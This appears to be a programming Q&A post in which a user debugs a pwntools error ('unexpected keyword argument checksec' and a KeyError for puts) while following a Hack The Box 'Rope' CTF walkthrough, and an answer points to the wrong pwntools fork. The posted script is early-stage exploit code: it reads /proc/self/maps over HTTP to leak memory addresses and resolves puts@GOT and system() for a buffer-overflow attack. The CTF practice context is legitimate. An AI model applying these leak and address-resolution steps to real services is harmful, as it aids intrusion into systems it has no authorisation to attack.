# TypeError: __init__() got an unexpected keyword argument 'checksec'

Tags: python, python-3.x, visual-studio, error-handling, buffer-overflow

I was watching this video https://youtu.be/GTQxZlr5yvE?t=2185 (Ippsec's Rope CTF) and he defines checksec argument. 
The exploit is buffer overflow in *httpserver*(custom server). Step 1 works perfectly fine. **First error** occurs at Step 2 at **elf = ELF("./httpserver" , checksec=False)** and **libc = ELF("./libc.so.6.32.self", checksec= False)**

```
from pwn import *
import requests

context(arch="i686",os="linux")

RHOST = '127.0.0.1'
RPORT = '9999'

def getFile(file):
    header = {"Range" : "bytes=0-4096"}
    r = requests.get(f"http://{RHOST}:{RPORT}/{file}",headers=header)
    return r.text

#step 1. Find Address                                 #THIS PART WORKS FINE

log.info("Finding Binary/Libc Location via /proc/self/maps")
maps = getFile("/proc/self/maps")
addr_bin = maps.split('\n')[0][:8]            #addr of httpserver
addr_libc = maps.split('\n')[6][:8]           #addr of libc.so.6
log.success(f"Binary is at : 0x{addr_bin}")
log.success(f"Binary is at : 0x{addr_libc}")

#step 2. Calculating offsets                           #THIS SECTION ERROR OCCURS

log.info("Finding the address of PUTS + SYSTEM()")
elf = ELF("./httpserver" , checksec=False)             #<----ERROR HERE checksec
libc = ELF("./libc.so.6.32.self", checksec= False)     #<----ERROR HERE checksec
elf.address = int(addr_bin, 16)
libc.address = int(addr_libc, 16)
got_puts = elf.got['puts']                             #<----ERROR HERE puts
system = libc.symbols['system']
log.success(f"Puts@GOT: {got_puts}")
log.success(f"SYSTEM@LIBC: {system}")
```

when I run the code i get this error

```
Traceback (most recent call last):
  File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 27, in <module>
    elf = ELF("./httpserver" , checksec= False)
TypeError: __init__() got an unexpected keyword argument 'checksec'
```

I searched for this error on google but couldnt find anything about it. Please can you help me with it ! I tried installing "pip install pyelftools" but getting same error. I did not got error when commented **checksec=False** part but again when I ran the code it gave me **second error** at

```
Exception has occurred: KeyError
'puts'
  File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 30, in <module>
    got_puts = elf.got['puts']
```

Can anyone tell me on how to solve these errors ? I cant practice :(

Comment: I guess the module `pwn` has a `ELF` class. You should open it and see how the function `__init__` is build.

Comment: I did not find elf class in file location "/usr/local/lib/python3.8/distpackages/pwn/__init__.py" or "/usr/local/lib/python3.8/distpackages/pwnlib/__init__.py" !

Answer (score 1):

I believe you grabbed Python3-PwnTools, which is an old fork from when pwntools didn't support py3.  Install the regular "pwntools" and it should work.